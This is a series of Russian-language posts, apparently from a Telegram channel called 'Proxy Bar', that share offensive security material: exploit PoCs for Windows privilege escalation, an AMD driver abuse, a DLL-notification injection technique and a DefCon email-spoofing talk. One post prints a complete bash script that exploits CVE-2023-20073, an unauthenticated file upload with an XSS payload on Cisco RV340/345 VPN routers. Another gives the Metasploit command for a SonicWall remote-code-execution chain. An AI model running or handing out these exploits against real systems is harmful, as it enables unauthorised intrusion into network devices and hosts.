DllNotificationInection
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
Используя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )
*
WriteUp "must have"
*
POC
👍10😱6
Если нужно быстро сориентироваться по системным вызовам ядра Linux.
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
Числа и параметры для различных архитектур и версий ядра.
https://syscalls.mebeim.net
#linux #syscalls #arch
🔥19👍4
Proxy Bar
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download
YouTube
SpamChannel: Impersonating Satan
This video demonstrates spoofing an email as Satan from churchofsatan.com using a Cloudflare Worker & MailChannels.
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
This was one of the demos in my Defcon 31 talk noscriptd "SpamChannel: Spoofing Emails From 2 Million+ Domains and Virtually Becoming Satan"…
👍8
This media is not supported in your browser
VIEW IN TELEGRAM
Я календарь переверну
И снова RATник в сентябре
И снова RATник в сентябре
🔥22👍6😱2
CVE-2023-20073
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:
Cisco RV340, RV340W, RV345, RV345P
Usage:
#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><noscript>alert('JS-test')</noscript>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"
#cisco👍14
CVE-2023-36874
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe
уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.
*
POC exploit
*
Read - exploit for 0-day Windows Error Reporting Service bug
#windows #lpe
🔥9👍2
HITCON 2023
Демонстрация использования
*
Exploit
#AMD
Демонстрация использования
AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*
Exploit
#AMD
🔥7👍1
Sonicwall rce CVE-2023-34124
*
metasploit
*
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
*
metasploit
*
use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃
Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets
🔥5👍2
xss.is вы там это, аккуратнее )
https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1😱36🔥21👍1